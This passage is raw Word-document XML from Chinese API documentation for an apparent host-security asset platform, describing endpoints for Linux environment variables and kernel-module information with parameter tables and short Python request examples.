            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2035B0F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46D256F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E5ED870" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>环境变量名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3BBFAEFB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B575E79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71D01FC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="585FC446" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CF98712" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>环境变量值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="08EA5813" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43A8AD53" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="390E1056" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B957C25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60C88D87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="77679281" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21419730" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sysEnv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C51CE72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>布尔数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1969EC98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FA63C64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>环境变量类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B6C5852" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>linux环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66852C8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def env_linux():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/env/linux?key=HOME&amp;value=/home/yangwu&amp;user=yangwu&amp;sysEnv=false,true" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'key': 'HOME', 'value': '/home/qingteng', 'user': 'qingteng', 'sysEnv': 'false,true'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0B63EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="身份认证">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>身份认证</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>，对于完整的模拟请求参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="启动项信息查询结果">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>启动项信息查询结果</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>的windows代码示例(python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36059693" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="环境变量信息扫描"/>
      <w:bookmarkEnd w:id="65"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>环境变量信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E5B93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求环境变量信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BBC589" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1995D5EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/env/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243C2DE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B8C93C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530CDAFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F39EDBC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/env/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C620642" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3796FE53" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A782A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534C2BF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F80C4"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073822E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B3BB779" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CFA4F62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09C445CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49B6DC8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2DD77111" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FA0DB28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29044714" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="242790ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CEF9297" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D195438" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>linux环境变量信息扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC0C748" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def refresh():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/env/linux/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A9CDF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="环境变量信息查询扫描状态"/>
      <w:bookmarkEnd w:id="66"/>
      <w:r>
        <w:t>环境变量信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4ED758" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询环境变量信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA80C61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="内核模块信息"/>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="67"/>
      <w:r>
        <w:t>内核模块信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EFD509" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC6E0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的内核模块信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA6898A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F76267" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>内核模块信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E86D924" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46451E1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A0DE87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A85D064" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>内核模块信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A983CA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>内核模块信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5BD8F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>内核模块信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579E5C35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7144421B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用内核模块信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A8F261"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066754B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4529FCBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="内核模块信息查询结果"/>
      <w:r>
        <w:t>内核模块信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D2066C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询内核模块信息，按每台主机每个内核模块进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724D51AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4317D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/kernelmodule/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F568CA"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516"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="2110"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7EA9BE4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CC2129C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C509CA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B966C11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74BC80E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="336EA692" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50F5E257" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03F90C22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="045336BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0767C7F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="153C497F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36F8FB18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08C58936" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D2D86A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76938AAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="470E226F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44DC5298" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="535979AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A9D76E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75E75754" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6A3982AC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="044BCBFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ADCEC84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="386A74B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="670C9EEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69ECF6AE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
